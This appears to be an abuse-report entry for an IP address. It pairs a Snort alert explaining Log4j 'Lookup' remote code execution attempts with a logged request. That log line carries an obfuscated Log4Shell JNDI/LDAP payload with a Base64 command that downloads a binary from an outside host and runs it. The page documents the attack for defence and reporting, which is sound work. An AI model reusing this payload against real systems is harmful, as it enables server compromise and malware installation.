Rule Category
SERVER-OTHER -- Snort has detected traffic exploiting vulnerabilities in a server in ...
show moreRule Category
SERVER-OTHER -- Snort has detected traffic exploiting vulnerabilities in a server in the network.
Alert Message
SERVER-OTHER Apache Log4j logging remote code execution attempt
Rule Explanation
This rule looks for attempts to exploit a remote code execution vulnerability in Log4j's "Lookup" functionality.
show less
Port Scan
Hacking
Brute-Force
SSH
Anonymous
The following intrusion was observed: Apache.Log4j.Error.Log.Remote.Code.Execution.
Web App Attack
Anonymous
Exploit Attempt
Hacking
Anonymous
[07/Aug/2022:10:30:14 +0000] "GET / HTTP/1.1" 404 146 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:- ...
show more[07/Aug/2022:10:30:14 +0000] "GET / HTTP/1.1" 404 146 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//168.138.128.171:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL2xvbC9zbXRwc2VydmVyOyBjdXJsIC1PIGh0dHA6Ly8xNjguMTM4LjEyOC4xNzEvbG9sL3NtdHBzZXJ2ZXI7IGNobW9kIDc3NyBzbXRwc2VydmVyOyAuL3NtdHBzZXJ2ZXIgcnVubmVy}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//168.138.128.171:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL2xvbC9zbXRwc2VydmVyOyBjdXJsIC1PIGh0dHA6Ly8xNjguMTM4LjEyOC4xNzEvbG9sL3NtdHBzZXJ2ZXI7IGNobW9kIDc3NyBzbXRwc2VydmVyOyAuL3NtdHBzZXJ2ZXIgcnVubmVy}')"
show less